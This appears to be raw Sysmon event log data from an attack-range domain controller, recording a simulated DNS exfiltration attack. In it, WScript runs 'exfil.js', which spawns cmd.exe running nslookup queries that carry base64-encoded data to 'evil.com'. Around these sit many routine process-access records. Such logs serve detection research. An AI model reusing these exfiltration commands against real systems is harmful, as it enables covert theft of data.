+51791 10341000x8000000000000000193988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.575{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-963D-000000005F02}708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.575{2E1864BB-17A4-629A-943D-000000005F02}74845556C:\Windows\system32\cmd.exe{2E1864BB-17A4-629A-963D-000000005F02}708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.582{2E1864BB-17A4-629A-963D-000000005F02}708C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A4-629A-943D-000000005F02}7484C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqin.tmp 2>&1 10341000x8000000000000000193984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.558{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-953D-000000005F02}2076C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.558{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-953D-000000005F02}2076C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.545{2E1864BB-17A4-629A-953D-000000005F02}20767648C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-943D-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.530{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-953D-000000005F02}2076C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.511{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.511{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.511{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-943D-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.511{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.511{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.511{2E1864BB-17A1-629A-783D-000000005F02}55525332C:\Windows\System32\WScript.exe{2E1864BB-17A4-629A-943D-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.521{2E1864BB-17A4-629A-943D-000000005F02}7484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqin.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000193973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.511{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsmkog.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.496{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=130F31D52891CDBAC0A6FBFEF9E660EF,SHA256=B03E5EDA4A1CDF7E5A749AD8193B948F908F7863F50A6A2E1719ABE9F1547B5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.459{2E1864BB-17A4-629A-923D-000000005F02}25602736C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-933D-000000005F02}4280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.459{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.459{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.459{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.459{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.459{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-933D-000000005F02}4280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.459{2E1864BB-17A4-629A-913D-000000005F02}49045000C:\Windows\system32\cmd.exe{2E1864BB-17A4-629A-933D-000000005F02}4280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.461{2E1864BB-17A4-629A-933D-000000005F02}4280C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A4-629A-913D-000000005F02}4904C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsmkog.tmp 2>&1 10341000x8000000000000000193963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.427{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-923D-000000005F02}2560C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.427{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-923D-000000005F02}2560C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.412{2E1864BB-17A4-629A-923D-000000005F02}25602736C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-913D-000000005F02}4904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.396{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-923D-000000005F02}2560C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 